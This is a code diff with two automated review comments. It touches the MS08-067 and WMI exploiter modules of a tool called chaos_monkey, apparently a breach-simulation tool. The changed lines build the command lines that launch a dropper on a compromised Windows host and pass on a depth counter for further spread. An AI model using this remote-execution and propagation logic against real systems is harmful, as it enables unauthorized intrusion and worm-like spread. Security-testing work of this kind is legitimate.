diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py
index a372070a8..ac9f878c7 100644
--- a/chaos_monkey/exploit/win_ms08_067.py
+++ b/chaos_monkey/exploit/win_ms08_067.py
@@ -249,11 +249,11 @@ class Ms08_067_Exploiter(HostExploiter):
 # execute the remote dropper in case the path isn't final
 if remote_full_path.lower() != self._config.dropper_target_path.lower():
- cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
+ cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
+ build_monkey_commandline(host, depth - 1, self._config.dropper_target_path)
 else:
- cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
-
- cmdline += build_monkey_commandline(host, depth - 1)
+ cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
+ build_monkey_commandline(host, depth - 1)
 try:
 sock.send("start %s\r\n" % (cmdline, ))
diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py
index ab034e416..312a497da 100644
--- a/chaos_monkey/exploit/wmiexec.py
+++ b/chaos_monkey/exploit/wmiexec.py
@@ -84,11 +84,11 @@ class WmiExploiter(HostExploiter):
 return False
 # execute the remote dropper in case the path isn't final
 elif remote_full_path.lower() != self._config.dropper_target_path.lower():
- cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
+ cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
+ build_monkey_commandline(host, depth - 1, self._config.dropper_target_path)
 else:
- cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
-
- cmdline += build_monkey_commandline(host, depth - 1)
+ cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
+ build_monkey_commandline(host, depth - 1)
 # execute the remote monkey
 result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
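Review bot: In win_ms08_067.py the new third argument `self._config.dropper_target_path` is a configured path that becomes part of the string passed to `sock.send("start %s\r\n" % (cmdline, ))`, and nothing visible in the hunk quotes or validates it. `build_monkey_commandline` is not shown in this diff, so whether it quotes the value cannot be confirmed from here; if it appends it verbatim, a path containing a space would be split into separate arguments when the command line is parsed. Worth confirming the helper quotes the path, or adding a comment such as `# dropper_target_path must not contain spaces; build_monkey_commandline does not quote it` where the assumption is made. The same applies to the dropper branch in the wmiexec.py hunk, where the string is handed to `Create(cmdline, ...)`. The enclosing method starts and ends outside the hunk.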
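Review bot: The two-branch `cmdline` construction in wmiexec.py is now a line-for-line copy of the one in win_ms08_067.py, so any later change to the dropper arguments has to be repeated in both exploiters; one shared helper on the `HostExploiter` base, or next to `build_monkey_commandline`, would keep them in step. The backslash continuations would also be sturdier as a parenthesised expression, for example `cmdline = (MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} +` followed by `build_monkey_commandline(host, depth - 1))`, because a stray space after `\` is a syntax error. Separately, `depth - 1` is passed on with no lower bound visible in either hunk; if the check that stops propagation at depth zero lives earlier in the method, a one-line comment pointing to it would make the containment guarantee easier to audit. The method body continues outside the hunk on both sides.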